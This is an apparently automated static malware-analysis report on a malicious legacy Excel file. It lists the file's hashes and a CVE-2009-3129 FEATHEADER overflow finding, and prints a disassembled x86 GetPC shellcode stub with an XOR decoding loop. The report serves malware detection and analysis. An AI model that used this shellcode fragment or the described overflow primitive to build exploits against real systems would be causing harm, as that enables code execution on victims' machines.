Malicious Office (OLE) / .XLS — malware analysis report

Static analysis result for SHA-256 eb252827668ac127…

MALICIOUS

Office (OLE) / .XLS

25.5 KB Created: 1996-12-17 01:32:42 Authoring application: Microsoft Excel First seen: 2026-05-10
MD5: 0ebb4b599514117b9eb1d679001613d3 SHA-1: c551c0a793a0f1c5625d5952c5834455e74279aa SHA-256: eb252827668ac1270df1c7f16ff67cb5925d04c5976a00e8e1c4cf8596bbe3e2
100 Risk Score

Malware Insights

The XLS file exhibits a suspicious heuristic firing related to a GetPC stub, often associated with macro execution in older Office documents. While no specific malicious content or URLs were extracted, this pattern suggests the potential for embedded VBA macros to be used for malicious purposes, such as downloading a second-stage payload. Further analysis of the macro code would be required for a definitive assessment.

Heuristics 2

  • CVE-2009-3129 — Excel FEATHEADER record overflow critical CVE exact CVE_2009_3129
    Workbook BIFF stream contains a FEATHEADER (Feature Header) record with anomalous size (record_size=23, isf=2, cbHdrData=4294967295). Legitimate FEATHEADER records are tiny (<100 bytes) and carry cbHdrData values that fit in the record body; the value here is the documented CVE-2009-3129 exploit primitive — cbHdrData drives a memcpy with attacker-controlled size, leading to memory corruption and code execution in Excel 2007/2003.
  • x86 GetPC stub (CALL $+5; POP EDI) high SC_GETPC_CALL
    x86 GetPC stub (CALL $+5; POP EDI)
    Disassembly
    Attempted x86 opcode disassembly
    00000D10  e800000000        call 0xd15
00000D15  5f                pop edi
00000D16  83c729            add edi, 0x29
00000D19  66bbb32d          mov bx, 0x2db3
00000D1D  57                push edi
00000D1E  5e                pop esi
00000D1F  33c9              xor ecx, ecx
00000D21  66b90402          mov cx, 0x204
00000D25  66ad              lodsw ax, word ptr [esi]
00000D27  6685c0            test ax, ax
00000D2A  740e              je 0xd3a
00000D2C  668bd0            mov dx, ax
00000D2F  6633d3            xor dx, bx
00000D32  6685d2            test dx, dx
00000D35  7403              je 0xd3a
00000D37  668bc2            mov ax, dx
00000D3A  66ab              stosw word ptr es:[edi], ax
00000D3C  e2e7              loop 0xd25
00000D3E  e6a6              out 0xa6, al
00000D40  5f                pop edi
00000D41  ae                scasb al, byte ptr es:[edi]
00000D42  5f                pop edi
00000D43  6d                insd dword ptr es:[edi], dx
00000D44  e07b              loopne 0xdc1
00000D46  e44d              in al, 0x4d
00000D48  d7                xlatb
00000D49  a6                cmpsb byte ptr [esi], byte ptr es:[edi]
00000D4A  a6                cmpsb byte ptr [esi], byte ptr es:[edi]
00000D4B  1d0000b3c4        sbb eax, 0xc4b30000
00000D50  132c00            adc ebp, dword ptr [eax + eax]
00000D53  003c68            add byte ptr [eax + ebp*2], bh
00000D56  47                inc edi
00000D57  a6                cmpsb byte ptr [esi], byte ptr es:[edi]
00000D58  f1                int1
00000D59  2138              and dword ptr [eax], edi
00000D5B  5d                pop ebp
00000D5C  af                scasd eax, dword ptr es:[edi]
00000D5D  803855            cmp byte ptr [eax], 0x55
00000D60  bba4cec938        mov ebx, 0x38c9cea4
00000D65  6a8f              push -0x71
00000D67  a6                cmpsb byte ptr [esi], byte ptr es:[edi]
00000D68  e72a              out 0x2a, eax
00000D6A  cb                retf
00000D6B  2e64a6            cmpsb byte ptr fs:[esi], byte ptr es:[edi]
00000D6E  e9                .byte 0xe9
00000D6F  0d                .byte 0x0d

Open this report in the interactive analyzer, or submit your own file for analysis.